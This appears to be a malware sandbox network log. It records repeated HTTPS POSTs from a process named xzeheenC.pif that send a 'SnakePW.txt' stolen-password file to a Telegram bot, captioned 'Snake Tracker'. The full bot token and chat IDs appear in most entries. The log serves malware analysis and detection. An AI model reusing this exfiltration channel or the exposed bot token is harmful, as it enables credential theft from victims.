                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418897,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535089,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      46 | 192.168.2.5 | 49959 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:09 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2125107c93fb
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:09 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd2125107c93fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:09 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:09 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418898,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535089,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      47 | 192.168.2.5 | 49960 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:09 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21fe3ea779ee
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:09 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd21fe3ea779eeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:09 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:09 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418900,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535089,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      48 | 192.168.2.5 | 49966 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:11 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd212895f468d0
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:11 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd212895f468d0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:11 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:11 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418904,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535091,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      49 | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:11 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2140552249de
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:11 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd2140552249deContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:11 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:11 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418907,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535091,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      50 | 192.168.2.5 | 49968 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:11 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd222e6a7585d6
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:11 UTC | 535 | OUT | Data Ascii: --------------------------8dd222e6a7585d6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:11 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:11 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418905,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535091,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      51 | 192.168.2.5 | 49973 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:13 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd214541f09a2e
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:13 UTC | 535 | OUT | Data Ascii: --------------------------8dd214541f09a2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:14 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:13 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:14 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418910,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535093,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      52 | 192.168.2.5 | 49974 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:13 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd225faa7b54ce
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:13 UTC | 535 | OUT | Data Ascii: --------------------------8dd225faa7b54ceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:14 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:13 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:14 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418911,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535093,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      53 | 192.168.2.5 | 49976 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:13 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2161f5499881
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:13 UTC | 535 | OUT | Data Ascii: --------------------------8dd2161f5499881Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:14 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:13 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:14 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418913,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535093,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      54 | 192.168.2.5 | 49982 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:15 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21699b4eabd7
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:15 UTC | 535 | OUT | Data Ascii: --------------------------8dd21699b4eabd7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:15 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:15 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:15 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418916,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535095,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      55 | 192.168.2.5 | 49983 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:15 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd229ac9c02cfe
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:15 UTC | 535 | OUT | Data Ascii: --------------------------8dd229ac9c02cfeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:16 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:15 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:16 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418918,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535095,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 49984 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:15 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd218608facd63
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:15 UTC | 535 | OUT | Data Ascii: --------------------------8dd218608facd63Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:16 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:15 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:16 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418919,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535095,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 49989 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:17 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2189f0cb04ca
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd2189f0cb04caContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:17 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:17 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:17 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418921,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535097,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 49990 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:17 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd22de6d3ef3c7
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd22de6d3ef3c7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:18 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:17 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:18 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418923,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535097,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 49991 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:17 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21a9f558bff4
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd21a9f558bff4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:18 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:17 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:18 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418924,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535097,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 49997 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:19 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21acbc242eed
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:19 UTC | 535 | OUT | Data Ascii: --------------------------8dd21acbc242eedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:19 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:19 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:19 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418928,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535099,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 49998 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:19 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2321d33b2b75
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:19 UTC | 535 | OUT | Data Ascii: --------------------------8dd2321d33b2b75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:20 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:19 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:20 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418930,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535099,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
